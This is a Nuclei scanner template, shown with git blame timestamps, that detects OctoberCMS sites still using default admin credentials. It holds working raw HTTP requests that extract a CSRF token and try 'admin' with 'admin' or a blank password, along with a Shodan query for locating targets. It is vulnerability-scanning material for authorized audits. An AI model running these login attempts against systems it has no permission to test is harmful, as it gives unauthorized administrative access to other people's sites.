nuclei-templates/default-logins/octobercms-default-login.yaml

67 lines
1.5 KiB
YAML
Raw Normal View History

2022-05-16 10:01:24 +00:00
id: octobercms-default-login
info:
name: OctoberCMS - Default Admin Discovery
2022-05-16 10:01:24 +00:00
author: princechaddha
severity: high
description: OctoberCMS default admin credentials were discovered.
2022-05-16 10:01:24 +00:00
reference:
- https://github.com/octobercms/october
- https://octobercms.com/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
2022-05-16 10:01:24 +00:00
metadata:
verified: true
2022-05-16 10:04:47 +00:00
shodan-query: http.component:"October CMS"
2022-05-16 10:01:24 +00:00
tags: octobercms,default-login,oss
requests:
- raw:
- |
GET /backend/backend/auth/signin HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
POST /backend/backend/auth/signin HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
_token={{token}}&postback=1&login={{username}}&password={{password}}
cookie-reuse: true
2022-05-17 06:19:23 +00:00
attack: clusterbomb
2022-05-16 10:01:24 +00:00
payloads:
username:
- admin
password:
- admin
2022-05-17 06:19:23 +00:00
- ""
2022-05-16 10:01:24 +00:00
matchers-condition: and
matchers:
- type: word
part: header
words:
- "october_session="
- "admin_auth="
condition: and
- type: status
status:
- 302
extractors:
- type: regex
part: body
name: token
internal: true
group: 1
regex:
- 'meta name="csrf\-token" content="([A-Za-z0-9]+)">'
# Enhanced by mp on 2022/07/15